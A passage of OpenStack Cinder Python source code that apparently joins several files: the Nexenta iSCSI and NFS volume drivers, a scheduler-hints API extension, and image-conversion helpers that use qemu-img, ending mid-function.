:param snapshot: snapshot reference
"""
self.nms.zvol.create_snapshot(
self._get_zvol_name(snapshot['volume_name']),
snapshot['name'], '')
def create_volume_from_snapshot(self, volume, snapshot):
"""Create new volume from other's snapshot on appliance.
:param volume: reference of volume to be created
:param snapshot: reference of source snapshot
"""
self.nms.zvol.clone(
'%s@%s' % (self._get_zvol_name(snapshot['volume_name']),
snapshot['name']),
self._get_zvol_name(volume['name']))
def delete_snapshot(self, snapshot):
"""Delete volume's snapshot on appliance.
:param snapshot: snapshot reference
"""
volume_name = self._get_zvol_name(snapshot['volume_name'])
snapshot_name = '%s@%s' % (volume_name, snapshot['name'])
try:
self.nms.snapshot.destroy(snapshot_name, '')
except nexenta.NexentaException as exc:
if "does not exist" in exc.args[0]:
LOG.info(_('Snapshot %s does not exist, it seems it was '
'already deleted.'), snapshot_name)
return
if "snapshot has dependent clones" in exc.args[0]:
raise exception.SnapshotIsBusy(snapshot_name=snapshot['name'])
raise
def local_path(self, volume):
"""Return local path to existing local volume.
We never have local volumes, so it raises NotImplementedError.
:raise: :py:exc:`NotImplementedError`
"""
raise NotImplementedError
def _target_exists(self, target):
"""Check if iSCSI target exist.
:param target: target name
:return: True if target exist, else False
"""
targets = self.nms.stmf.list_targets()
if not targets:
return False
return target in self.nms.stmf.list_targets()
def _target_group_exists(self, target_group):
"""Check if target group exist.
:param target_group: target group
:return: True if target group exist, else False
"""
groups = self.nms.stmf.list_targetgroups()
if not groups:
return False
return target_group in groups
def _target_member_in_target_group(self, target_group, target_member):
"""Check if target member in target group.
:param target_group: target group
:param target_member: target member
:return: True if target member in target group, else False
:raises: NexentaException if target group doesn't exist
"""
members = self.nms.stmf.list_targetgroup_members(target_group)
if not members:
return False
return target_member in members
def _lu_exists(self, zvol_name):
"""Check if LU exists on appliance.
:param zvol_name: Zvol name
:raises: NexentaException if zvol not exists
:return: True if LU exists, else False
"""
try:
return bool(self.nms.scsidisk.lu_exists(zvol_name))
except nexenta.NexentaException as exc:
if 'does not exist' not in exc.args[0]:
raise
return False
def _is_lu_shared(self, zvol_name):
"""Check if LU exists on appliance and shared.
:param zvol_name: Zvol name
:raises: NexentaException if Zvol not exist
:return: True if LU exists and shared, else False
"""
try:
shared = self.nms.scsidisk.lu_shared(zvol_name) > 0
except nexenta.NexentaException as exc:
if 'does not exist for zvol' not in exc.args[0]:
raise # Zvol does not exists
shared = False # LU does not exist
return shared
def _is_volume_exported(self, volume):
"""Check if volume exported.
:param volume: volume object
:return: True if volume exported, else False
"""
zvol_name = self._get_zvol_name(volume['name'])
target_name = self._get_target_name(volume['name'])
target_group_name = self._get_target_group_name(volume['name'])
return (self._target_exists(target_name) and
self._target_group_exists(target_group_name) and
self._target_member_in_target_group(target_group_name,
target_name) and
self._lu_exists(zvol_name) and
self._is_lu_shared(zvol_name))
def _get_provider_location(self, volume):
"""Returns volume iscsiadm-formatted provider location string."""
return '%(host)s:%(port)s,1 %(name)s 0' % {
'host': self.nms_host,
'port': self.configuration.nexenta_iscsi_target_portal_port,
'name': self._get_target_name(volume['name'])
}
def _do_export(self, _ctx, volume, ensure=False):
"""Do all steps to get zvol exported as LUN 0 at separate target.
:param volume: reference of volume to be exported
:param ensure: if True, ignore errors caused by already existing
resources
"""
zvol_name = self._get_zvol_name(volume['name'])
target_name = self._get_target_name(volume['name'])
target_group_name = self._get_target_group_name(volume['name'])
if not self._target_exists(target_name):
try:
self.nms.iscsitarget.create_target({
'target_name': target_name})
except nexenta.NexentaException as exc:
if ensure and 'already configured' in exc.args[0]:
LOG.info(_('Ignored target creation error "%s" while '
'ensuring export'), exc)
else:
raise
if not self._target_group_exists(target_group_name):
try:
self.nms.stmf.create_targetgroup(target_group_name)
except nexenta.NexentaException as exc:
if ((ensure and 'already exists' in exc.args[0]) or
'target must be offline' in exc.args[0]):
LOG.info(_('Ignored target group creation error "%s" '
'while ensuring export'), exc)
else:
raise
if not self._target_member_in_target_group(target_group_name,
target_name):
try:
self.nms.stmf.add_targetgroup_member(target_group_name,
target_name)
except nexenta.NexentaException as exc:
if ((ensure and 'already exists' in exc.args[0]) or
'target must be offline' in exc.args[0]):
LOG.info(_('Ignored target group member addition error '
'"%s" while ensuring export'), exc)
else:
raise
if not self._lu_exists(zvol_name):
try:
self.nms.scsidisk.create_lu(zvol_name, {})
except nexenta.NexentaException as exc:
if not ensure or 'in use' not in exc.args[0]:
raise
LOG.info(_('Ignored LU creation error "%s" while ensuring '
'export'), exc)
if not self._is_lu_shared(zvol_name):
try:
self.nms.scsidisk.add_lun_mapping_entry(zvol_name, {
'target_group': target_group_name,
'lun': '0'})
except nexenta.NexentaException as exc:
if not ensure or 'view entry exists' not in exc.args[0]:
raise
LOG.info(_('Ignored LUN mapping entry addition error "%s" '
'while ensuring export'), exc)
def create_export(self, _ctx, volume):
"""Create new export for zvol.
:param volume: reference of volume to be exported
:return: iscsiadm-formatted provider location string
"""
self._do_export(_ctx, volume, ensure=False)
return {'provider_location': self._get_provider_location(volume)}
def ensure_export(self, _ctx, volume):
"""Recreate parts of export if necessary.
:param volume: reference of volume to be exported
"""
self._do_export(_ctx, volume, ensure=True)
def remove_export(self, _ctx, volume):
"""Destroy all resources created to export zvol.
:param volume: reference of volume to be unexported
"""
zvol_name = self._get_zvol_name(volume['name'])
target_name = self._get_target_name(volume['name'])
target_group_name = self._get_target_group_name(volume['name'])
self.nms.scsidisk.delete_lu(zvol_name)
try:
self.nms.stmf.destroy_targetgroup(target_group_name)
except nexenta.NexentaException as exc:
# We assume that target group is already gone
LOG.warn(_('Got error trying to destroy target group'
' %(target_group)s, assuming it is '
'already gone: %(exc)s'),
{'target_group': target_group_name, 'exc': exc})
try:
self.nms.iscsitarget.delete_target(target_name)
except nexenta.NexentaException as exc:
# We assume that target is gone as well
LOG.warn(_('Got error trying to delete target %(target)s,'
' assuming it is already gone: %(exc)s'),
{'target': target_name, 'exc': exc})
def get_volume_stats(self, refresh=False):
"""Get volume stats.
If 'refresh' is True, run update the stats first.
"""
if refresh:
self._update_volume_stats()
return self._stats
def _update_volume_stats(self):
"""Retrieve stats info for NexentaStor appliance."""
LOG.debug('Updating volume stats')
stats = self.nms.volume.get_child_props(
self.configuration.nexenta_volume, 'health|size|used|available')
total_amount = utils.str2gib_size(stats['size'])
free_amount = utils.str2gib_size(stats['available'])
location_info = '%(driver)s:%(host)s:%(volume)s' % {
'driver': self.__class__.__name__,
'host': self.nms_host,
'volume': self.volume
}
self._stats = {
'vendor_name': 'Nexenta',
'driver_version': self.VERSION,
'storage_protocol': 'iSCSI',
'total_capacity_gb': total_amount,
'free_capacity_gb': free_amount,
'reserved_percentage': 0,
'QoS_support': False,
'volume_backend_name': self.backend_name,
'location_info': location_info,
'iscsi_target_portal_port': self.iscsi_target_portal_port,
'nms_url': self.nms.url
}
|
adelina-t/cinder | cinder/volume/drivers/nexenta/nfs.py | <filename>cinder/volume/drivers/nexenta/nfs.py
# Copyright 2013 Nexenta Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
:mod:`nexenta.nfs` -- Driver to store volumes on NexentaStor Appliance.
=======================================================================
.. automodule:: nexenta.nfs
.. moduleauthor:: <NAME> <<EMAIL>>
.. moduleauthor:: <NAME> <<EMAIL>>
"""
import hashlib
import os
import re
from cinder import context
from cinder import db
from cinder import exception
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder.openstack.common import units
from cinder.volume.drivers import nexenta
from cinder.volume.drivers.nexenta import jsonrpc
from cinder.volume.drivers.nexenta import options
from cinder.volume.drivers.nexenta import utils
from cinder.volume.drivers import nfs
VERSION = '1.1.3'
LOG = logging.getLogger(__name__)
class NexentaNfsDriver(nfs.NfsDriver): # pylint: disable=R0921
"""Executes volume driver commands on Nexenta Appliance.
Version history:
1.0.0 - Initial driver version.
1.1.0 - Auto sharing for enclosing folder.
1.1.1 - Added caching for NexentaStor appliance 'volroot' value.
1.1.2 - Ignore "folder does not exist" error in delete_volume and
delete_snapshot method.
1.1.3 - Redefined volume_backend_name attribute inherited from
RemoteFsDriver.
"""
driver_prefix = 'nexenta'
volume_backend_name = 'NexentaNfsDriver'
VERSION = VERSION
def __init__(self, *args, **kwargs):
super(NexentaNfsDriver, self).__init__(*args, **kwargs)
if self.configuration:
self.configuration.append_config_values(
options.NEXENTA_NFS_OPTIONS)
conf = self.configuration
self.nms_cache_volroot = conf.nexenta_nms_cache_volroot
self._nms2volroot = {}
self.share2nms = {}
def do_setup(self, context):
super(NexentaNfsDriver, self).do_setup(context)
self._load_shares_config(getattr(self.configuration,
self.driver_prefix +
'_shares_config'))
def check_for_setup_error(self):
"""Verify that the volume for our folder exists.
:raise: :py:exc:`LookupError`
"""
if self.share2nms:
for nfs_share in self.share2nms:
nms = self.share2nms[nfs_share]
volume_name, dataset = self._get_share_datasets(nfs_share)
if not nms.volume.object_exists(volume_name):
raise LookupError(_("Volume %s does not exist in Nexenta "
"Store appliance"), volume_name)
folder = '%s/%s' % (volume_name, dataset)
if not nms.folder.object_exists(folder):
raise LookupError(_("Folder %s does not exist in Nexenta "
"Store appliance"), folder)
self._share_folder(nms, volume_name, dataset)
def initialize_connection(self, volume, connector):
"""Allow connection to connector and return connection info.
:param volume: volume reference
:param connector: connector reference
"""
export = '%s/%s' % (volume['provider_location'], volume['name'])
data = {'export': export, 'name': 'volume'}
if volume['provider_location'] in self.shares:
data['options'] = self.shares[volume['provider_location']]
return {
'driver_volume_type': self.driver_volume_type,
'data': data
}
def _do_create_volume(self, volume):
nfs_share = volume['provider_location']
nms = self.share2nms[nfs_share]
vol, dataset = self._get_share_datasets(nfs_share)
folder = '%s/%s' % (dataset, volume['name'])
LOG.debug('Creating folder on Nexenta Store %s', folder)
nms.folder.create_with_props(
vol, folder,
{'compression': self.configuration.nexenta_volume_compression}
)
volume_path = self.remote_path(volume)
volume_size = volume['size']
try:
self._share_folder(nms, vol, folder)
if getattr(self.configuration,
self.driver_prefix + '_sparsed_volumes'):
self._create_sparsed_file(nms, volume_path, volume_size)
else:
compression = nms.folder.get('compression')
if compression != 'off':
# Disable compression, because otherwise will not use space
# on disk.
nms.folder.set('compression', 'off')
try:
self._create_regular_file(nms, volume_path, volume_size)
finally:
if compression != 'off':
# Backup default compression value if it was changed.
nms.folder.set('compression', compression)
self._set_rw_permissions_for_all(nms, volume_path)
except nexenta.NexentaException as exc:
try:
nms.folder.destroy('%s/%s' % (vol, folder))
except nexenta.NexentaException:
LOG.warning(_("Cannot destroy created folder: "
"%(vol)s/%(folder)s"),
{'vol': vol, 'folder': folder})
raise exc
def create_volume_from_snapshot(self, volume, snapshot):
"""Create new volume from other's snapshot on appliance.
:param volume: reference of volume to be created
:param snapshot: reference of source snapshot
"""
self._ensure_shares_mounted()
snapshot_vol = self._get_snapshot_volume(snapshot)
nfs_share = snapshot_vol['provider_location']
volume['provider_location'] = nfs_share
nms = self.share2nms[nfs_share]
vol, dataset = self._get_share_datasets(nfs_share)
snapshot_name = '%s/%s/%s@%s' % (vol, dataset, snapshot['volume_name'],
snapshot['name'])
folder = '%s/%s' % (dataset, volume['name'])
nms.folder.clone(snapshot_name, '%s/%s' % (vol, folder))
try:
self._share_folder(nms, vol, folder)
except nexenta.NexentaException:
try:
nms.folder.destroy('%s/%s' % (vol, folder), '')
except nexenta.NexentaException:
LOG.warning(_("Cannot destroy cloned folder: "
"%(vol)s/%(folder)s"),
{'vol': vol, 'folder': folder})
raise
return {'provider_location': volume['provider_location']}
def create_cloned_volume(self, volume, src_vref):
"""Creates a clone of the specified volume.
:param volume: new volume reference
:param src_vref: source volume reference
"""
LOG.info(_('Creating clone of volume: %s'), src_vref['id'])
snapshot = {'volume_name': src_vref['name'],
'volume_id': src_vref['id'],
'name': self._get_clone_snapshot_name(volume)}
# We don't delete this snapshot, because this snapshot will be origin
# of new volume. This snapshot will be automatically promoted by NMS
# when user will delete its origin.
self.create_snapshot(snapshot)
try:
return self.create_volume_from_snapshot(volume, snapshot)
except nexenta.NexentaException:
LOG.error(_('Volume creation failed, deleting created snapshot '
'%(volume_name)s@%(name)s'), snapshot)
try:
self.delete_snapshot(snapshot)
except (nexenta.NexentaException, exception.SnapshotIsBusy):
LOG.warning(_('Failed to delete zfs snapshot '
'%(volume_name)s@%(name)s'), snapshot)
raise
def delete_volume(self, volume):
"""Deletes a logical volume.
:param volume: volume reference
"""
super(NexentaNfsDriver, self).delete_volume(volume)
nfs_share = volume.get('provider_location')
if nfs_share:
nms = self.share2nms[nfs_share]
vol, parent_folder = self._get_share_datasets(nfs_share)
folder = '%s/%s/%s' % (vol, parent_folder, volume['name'])
props = nms.folder.get_child_props(folder, 'origin') or {}
try:
nms.folder.destroy(folder, '-r')
except nexenta.NexentaException as exc:
if 'does not exist' in exc.args[0]:
LOG.info(_('Folder %s does not exist, it was '
'already deleted.'), folder)
return
raise
origin = props.get('origin')
if origin and self._is_clone_snapshot_name(origin):
try:
nms.snapshot.destroy(origin, '')
except nexenta.NexentaException as exc:
if 'does not exist' in exc.args[0]:
LOG.info(_('Snapshot %s does not exist, it was '
'already deleted.'), origin)
return
raise
def create_snapshot(self, snapshot):
"""Creates a snapshot.
:param snapshot: snapshot reference
"""
volume = self._get_snapshot_volume(snapshot)
nfs_share = volume['provider_location']
nms = self.share2nms[nfs_share]
vol, dataset = self._get_share_datasets(nfs_share)
folder = '%s/%s/%s' % (vol, dataset, volume['name'])
nms.folder.create_snapshot(folder, snapshot['name'], '-r')
def delete_snapshot(self, snapshot):
"""Deletes a snapshot.
:param snapshot: snapshot reference
"""
volume = self._get_snapshot_volume(snapshot)
nfs_share = volume['provider_location']
nms = self.share2nms[nfs_share]
vol, dataset = self._get_share_datasets(nfs_share)
folder = '%s/%s/%s' % (vol, dataset, volume['name'])
try:
nms.snapshot.destroy('%s@%s' % (folder, snapshot['name']), '')
except nexenta.NexentaException as exc:
if 'does not exist' in exc.args[0]:
LOG.info(_('Snapshot %s does not exist, it was '
'already deleted.'), '%s@%s' % (folder, snapshot))
return
raise
def _create_sparsed_file(self, nms, path, size):
"""Creates file with 0 disk usage.
:param nms: nms object
:param path: path to new file
:param size: size of file
"""
nms.appliance.execute(
'truncate --size %(size)dG %(path)s' % {
'path': path,
'size': size
}
)
def _create_regular_file(self, nms, path, size):
"""Creates regular file of given size.
Takes a lot of time for large files.
:param nms: nms object
:param path: path to new file
:param size: size of file
"""
block_size_mb = 1
block_count = size * units.Gi / (block_size_mb * units.Mi)
LOG.info(_('Creating regular file: %s.'
'This may take some time.') % path)
nms.appliance.execute(
'dd if=/dev/zero of=%(path)s bs=%(bs)dM count=%(count)d' % {
'path': path,
'bs': block_size_mb,
'count': block_count
}
)
LOG.info(_('Regular file: %s created.') % path)
def _set_rw_permissions_for_all(self, nms, path):
"""Sets 666 permissions for the path.
:param nms: nms object
:param path: path to file
"""
nms.appliance.execute('chmod ugo+rw %s' % path)
def local_path(self, volume):
"""Get volume path (mounted locally fs path) for given volume.
:param volume: volume reference
"""
nfs_share = volume['provider_location']
return os.path.join(self._get_mount_point_for_share(nfs_share),
volume['name'], 'volume')
def _get_mount_point_for_share(self, nfs_share):
"""Returns path to mount point NFS share.
:param nfs_share: example 172.18.194.100:/var/nfs
"""
return os.path.join(self.configuration.nexenta_mount_point_base,
hashlib.md5(nfs_share).hexdigest())
def remote_path(self, volume):
"""Get volume path (mounted remotely fs path) for given volume.
:param volume: volume reference
"""
nfs_share = volume['provider_location']
share = nfs_share.split(':')[1].rstrip('/')
return '%s/%s/volume' % (share, volume['name'])
def _share_folder(self, nms, volume, folder):
"""Share NFS folder on NexentaStor Appliance.
:param nms: nms object
:param volume: volume name
:param folder: folder name
"""
path = '%s/%s' % (volume, folder.lstrip('/'))
share_opts = {
'read_write': '*',
'read_only': '',
'root': 'nobody',
'extra_options': 'anon=0',
'recursive': 'true',
'anonymous_rw': 'true',
}
LOG.debug('Sharing folder %s on Nexenta Store', folder)
nms.netstorsvc.share_folder('svc:/network/nfs/server:default', path,
share_opts)
def _load_shares_config(self, share_file):
self.shares = {}
self.share2nms = {}
for share in self._read_config_file(share_file):
# A configuration line may be either:
# host:/share_name http://user:pass@host:[port]/
# or
# host:/share_name http://user:pass@host:[port]/
# -o options=123,rw --other
if not share.strip():
continue
if share.startswith('#'):
continue
share_info = re.split(r'\s+', share, 2)
share_address = share_info[0].strip().decode('unicode_escape')
nms_url = share_info[1].strip()
share_opts = share_info[2].strip() if len(share_info) > 2 else None
if not re.match(r'.+:/.+', share_address):
LOG.warn("Share %s ignored due to invalid format. Must be of "
"form address:/export." % share_address)
continue
self.shares[share_address] = share_opts
self.share2nms[share_address] = self._get_nms_for_url(nms_url)
LOG.debug('Shares loaded: %s' % self.shares)
def _get_capacity_info(self, nfs_share):
"""Calculate available space on the NFS share.
:param nfs_share: example 172.18.194.100:/var/nfs
"""
nms = self.share2nms[nfs_share]
ns_volume, ns_folder = self._get_share_datasets(nfs_share)
folder_props = nms.folder.get_child_props('%s/%s' % (ns_volume,
ns_folder), '')
free = utils.str2size(folder_props['available'])
allocated = utils.str2size(folder_props['used'])
return free + allocated, free, allocated
def _get_nms_for_url(self, url):
"""Returns initialized nms object for url."""
auto, scheme, user, password, host, port, path =\
utils.parse_nms_url(url)
return jsonrpc.NexentaJSONProxy(scheme, host, port, path, user,
password, auto=auto)
def _get_snapshot_volume(self, snapshot):
ctxt = context.get_admin_context()
return db.volume_get(ctxt, snapshot['volume_id'])
def _get_volroot(self, nms):
"""Returns volroot property value from NexentaStor appliance."""
if not self.nms_cache_volroot:
return nms.server.get_prop('volroot')
if nms not in self._nms2volroot:
self._nms2volroot[nms] = nms.server.get_prop('volroot')
return self._nms2volroot[nms]
def _get_share_datasets(self, nfs_share):
nms = self.share2nms[nfs_share]
volroot = self._get_volroot(nms)
path = nfs_share.split(':')[1][len(volroot):].strip('/')
volume_name = path.split('/')[0]
folder_name = '/'.join(path.split('/')[1:])
return volume_name, folder_name
def _get_clone_snapshot_name(self, volume):
"""Return name for snapshot that will be used to clone the volume."""
return 'cinder-clone-snapshot-%(id)s' % volume
def _is_clone_snapshot_name(self, snapshot):
"""Check if snapshot is created for cloning."""
name = snapshot.split('@')[-1]
return name.startswith('cinder-clone-snapshot-')
|
adelina-t/cinder | cinder/api/contrib/scheduler_hints.py | <reponame>adelina-t/cinder<filename>cinder/api/contrib/scheduler_hints.py
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob.exc
from cinder.api import extensions
from cinder.api.openstack import wsgi
from cinder.api.v2 import volumes
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
LOG = logging.getLogger(__name__)
class SchedulerHintsController(wsgi.Controller):
@staticmethod
def _extract_scheduler_hints(body):
hints = {}
attr = '%s:scheduler_hints' % Scheduler_hints.alias
try:
if attr in body:
hints.update(body[attr])
except ValueError:
msg = _("Malformed scheduler_hints attribute")
raise webob.exc.HTTPBadRequest(explanation=msg)
return hints
@wsgi.extends
def create(self, req, body):
hints = self._extract_scheduler_hints(body)
if 'volume' in body:
body['volume']['scheduler_hints'] = hints
yield
class Scheduler_hints(extensions.ExtensionDescriptor):
"""Pass arbitrary key/value pairs to the scheduler."""
name = "SchedulerHints"
alias = "OS-SCH-HNT"
namespace = volumes.SCHEDULER_HINTS_NAMESPACE
updated = "2013-04-18T00:00:00+00:00"
def get_controller_extensions(self):
controller = SchedulerHintsController()
ext = extensions.ControllerExtension(self, 'volumes', controller)
return [ext]
|
adelina-t/cinder | cinder/image/image_utils.py | <filename>cinder/image/image_utils.py
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Helper methods to deal with images.
This is essentially a copy from nova.virt.images.py
Some slight modifications, but at some point
we should look at maybe pushing this up to Oslo
"""
import contextlib
import os
import tempfile
from oslo.config import cfg
from cinder import exception
from cinder.openstack.common import fileutils
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import imageutils
from cinder.openstack.common import log as logging
from cinder.openstack.common import processutils
from cinder.openstack.common import units
from cinder import utils
from cinder.volume import utils as volume_utils
LOG = logging.getLogger(__name__)
image_helper_opt = [cfg.StrOpt('image_conversion_dir',
default='$state_path/conversion',
help='Directory used for temporary storage '
'during image conversion'), ]
CONF = cfg.CONF
CONF.register_opts(image_helper_opt)
def qemu_img_info(path):
"""Return an object containing the parsed output from qemu-img info."""
cmd = ('env', 'LC_ALL=C', 'qemu-img', 'info', path)
if os.name == 'nt':
cmd = cmd[2:]
out, err = utils.execute(*cmd, run_as_root=True)
return imageutils.QemuImgInfo(out)
def convert_image(source, dest, out_format, bps_limit=None):
"""Convert image to other format."""
cmd = ('qemu-img', 'convert', '-O', out_format, source, dest)
cgcmd = volume_utils.setup_blkio_cgroup(source, dest, bps_limit)
if cgcmd:
cmd = tuple(cgcmd) + cmd
cmd += ('-t', 'none') # required to enable ratelimit by blkio cgroup
utils.execute(*cmd, run_as_root=True)
def resize_image(source, size, run_as_root=False):
"""Changes the virtual size of the image."""
cmd = ('qemu-img', 'resize', source, '%sG' % size)
utils.execute(*cmd, run_as_root=run_as_root)
def fetch(context, image_service, image_id, path, _user_id, _project_id):
# TODO(vish): Improve context handling and add owner and auth data
# when it is added to glance. Right now there is no
# auth checking in glance, so we assume that access was
# checked before we got here.
with fileutils.remove_path_on_error(path):
with open(path, "wb") as image_file:
image_service.download(context, image_id, image_file)
def fetch_verify_image(context, image_service, image_id, dest,
user_id=None, project_id=None, size=None):
fetch(context, image_service, image_id, dest,
None, None)
with fileutils.remove_path_on_error(dest):
data = qemu_img_info(dest)
fmt = data.file_format
if fmt is None:
raise exception.ImageUnacceptable(
reason=_("'qemu-img info' parsing failed."),
image_id=image_id)
backing_file = data.backing_file
if backing_file is not None:
raise exception.ImageUnacceptable(
image_id=image_id,
reason=(_("fmt=%(fmt)s backed by: %(backing_file)s") %
{'fmt': fmt, 'backing_file': backing_file}))
# NOTE(xqueralt): If the image virtual size doesn't fit in the
# requested volume there is no point on resizing it because it will
# generate an unusable image.
if size is not None and data.virtual_size > size:
params = {'image_size': data.virtual_size, 'volume_size': size}
reason = _("Size is %(image_size)dGB and doesn't fit in a "
"volume of size %(volume_size)dGB.") % params
raise exception.ImageUnacceptable(image_id=image_id, reason=reason)
def fetch_to_vhd(context, image_service,
image_id, dest, blocksize,
user_id=None, project_id=None):
fetch_to_volume_format(context, image_service, image_id, dest, 'vpc',
blocksize, user_id, project_id)
def fetch_to_raw(context, image_service,
image_id, dest, blocksize,
user_id=None, project_id=None, size=None):
fetch_to_volume_format(context, image_service, image_id, dest, 'raw',
blocksize, user_id, project_id, size)
def fetch_to_volume_format(context, image_service,
image_id, dest, volume_format, blocksize,
user_id=None, project_id=None, size=None):
if (CONF.image_conversion_dir and not
os.path.exists(CONF.image_conversion_dir)):
os.makedirs(CONF.image_conversion_dir)
qemu_img = True
image_meta = image_service.show(context, image_id)
# NOTE(avishay): I'm not crazy about creating temp files which may be
# large and cause disk full errors which would confuse users.
# Unfortunately it seems that you can't pipe to 'qemu-img convert' because
# it seeks. Maybe we can think of something for a future version.
with temporary_file() as tmp:
# We may be on a system that doesn't have qemu-img installed. That
# is ok if we are working with a RAW image. This logic checks to see
# if qemu-img is installed. If not we make sure the image is RAW and
# throw an exception if not. Otherwise we stop before needing
# qemu-img. Systems with qemu-img will always progress through the
# whole function.
try:
# Use the empty tmp file to make sure qemu_img_info works.
qemu_img_info(tmp)
except processutils.ProcessExecutionError:
qemu_img = False
if image_meta:
if image_meta['disk_format'] != 'raw':
raise exception.ImageUnacceptable(
reason=_("qemu-img is not installed and image is of "
"type %s. Only RAW images can be used if "
"qemu-img is not installed.") %
image_meta['disk_format'],
image_id=image_id)
else:
raise exception.ImageUnacceptable(
reason=_("qemu-img is not installed and the disk "
"format is not specified. Only RAW images "
"can be used if qemu-img is not installed."),
image_id=image_id)
fetch(context, image_service, image_id, tmp, user_id, project_id)
if is_xenserver_image(context, image_service, image_id):
replace_xenserver_image_with_coalesced_vhd(tmp)
if not qemu_img:
# qemu-img is not installed but we do have a RAW image. As a
# result we only need to copy the image to the destination and then
# return.
LOG.debug('Copying image from %(tmp)s to volume %(dest)s - '
'size: %(size)s' % {'tmp': tmp, 'dest': dest,
'size': image_meta['size']})
volume_utils.copy_volume(tmp, dest, image_meta['size'], blocksize)
return
data = qemu_img_info(tmp)
virt_size = data.virtual_size / units.Gi
# NOTE(xqueralt): If the image virtual size doesn't fit in the
# requested volume there is no point on resizing it because it will
# generate an unusable image.
if size is not None and virt_size > size:
params = {'image_size': virt_size, 'volume_size': size}
reason = _("Size is %(image_size)dGB and doesn't fit in a "
"volume of size %(volume_size)dGB.") % params
raise exception.ImageUnacceptable(image_id=image_id, reason=reason)
fmt = data.file_format
if fmt is None:
raise exception.ImageUnacceptable(
reason=_("'qemu-img info' parsing failed."),
image_id=image_id)
backing_file = data.backing_file
if backing_file is not None:
raise exception.ImageUnacceptable(
image_id=image_id,
reason=_("fmt=%(fmt)s backed by:%(backing_file)s")
% {'fmt': fmt, 'backing_file': backing_file, })
# NOTE(jdg): I'm using qemu-img convert to write
# to the volume regardless if it *needs* conversion or not
# TODO(avishay): We can speed this up by checking if the image is raw
# and if so, writing directly to the device. However, we need to keep
# check via 'qemu-img info' that what we copied was in fact a raw
# image and not a different format with a backing file, which may be
# malicious.
LOG.debug("%s was %s, converting to %s " % (image_id, fmt,
volume_format))
convert_image(tmp, dest, volume_format,
bps_limit=CONF.volume_copy_bps_limit)
data = qemu_img_info(dest)
if data.file_format != volume_format:
raise exception.ImageUnacceptable(
image_id=image_id,
reason=_("Converted to %(vol_format)s, but format is "
"now %(file_format)s") % {'vol_format': volume_format,
'file_format': data.
file_format})
def upload_volume(context, image_service, image_meta, volume_path,
volume_format='raw'):
image_id = image_meta['id']
if (image_meta['disk_format'] == volume_format):
LOG.debug("%s was %s, no need to convert to %s" %
(image_id, volume_format, image_meta['disk_format']))
if os.name == 'nt' or os.access(volume_path, os.R_OK):
with fileutils.file_open(volume_path) as image_file:
image_service.update(context, image_id, {}, image_file)
else:
with utils.temporary_chown(volume_path):
with fileutils.file_open(volume_path) as image_file:
image_service.update(context, image_id, {}, image_file)
return
if (CONF.image_conversion_dir and not
os.path.exists(CONF.image_conversion_dir)):
os.makedirs(CONF.image_conversion_dir)
fd, tmp = tempfile.mkstemp(dir=CONF.image_conversion_dir)
os.close(fd)
with fileutils.remove_path_on_error(tmp):
LOG.debug("%s was %s, converting to %s" %
(image_id, volume_format, image_meta['disk_format']))
convert_image(volume_path, tmp, image_meta['disk_format'],
bps_limit=CONF.volume_copy_bps_limit)
data = qemu_img_info(tmp)
if data.file_format != image_meta['disk_format']:
raise exception.ImageUnacceptable(
image_id=image_id,
reason=_("Converted to %(f1)s, but format is now %(f2)s") %
{'f1': image_meta['disk_format'], 'f2': data.file_format})
with fileutils.file_open(tmp) as image_file:
image_service.update(context, image_id, {}, image_file)
fileutils.delete_if_exists(tmp)
def is_xenserver_image(context, image_service, image_id):
image_meta = image_service.show(context, image_id)
return is_xenserver_format(image_meta)
def is_xenserver_format(image_meta):
return (
image_meta['disk_format'] == 'vhd'
and image_meta['container_format'] == 'ovf'
)
def file_exist(fpath):
return os.path.exists(fpath)
def set_vhd_parent(vhd_path, parentpath):
utils.execute('vhd-util', 'modify', '-n', vhd_path, '-p', parentpath)
def extract_targz(archive_name, target):
utils.execute('tar', '-xzf', archive_name, '-C', target)
def fix_vhd_chain(vhd_chain):
for child, parent in zip(vhd_chain[:-1], vhd_chain[1:]):
set_vhd_parent(child, parent)
def get_vhd_size(vhd_path):
out, err = utils.execute('vhd-util', 'query', '-n', vhd_path, '-v')
return int(out)
def resize_vhd(vhd_path, size, journal):
utils.execute(
'vhd-util', 'resize', '-n', vhd_path, '-s', '%d' % size, '-j', journal)
def coalesce_vhd(vhd_path):
utils.execute(
'vhd-util', 'coalesce', '-n', vhd_path)
def create_temporary_file(*args, **kwargs):
fd, tmp = tempfile.mkstemp(dir=CONF.image_conversion_dir, *args, **kwargs)
os.close(fd)
return tmp
def rename_file(src, dst):
os.rename(src, dst)
@contextlib.contextmanager
def temporary_file(*args, **kwargs):
try:
tmp = create_temporary_file(*args, **kwargs)
yield tmp
finally:
fileutils.delete_if_exists(tmp)
def temporary_dir():
return utils.tempdir(dir=CONF.image_conversion_dir)
def coalesce_chain(vhd_chain):
for child, parent in zip(vhd_chain[:-1], vhd_chain[1:]):
with temporary_dir() as directory_for_journal:
size = get_vhd_size(child)
journal_file = os.path.join(
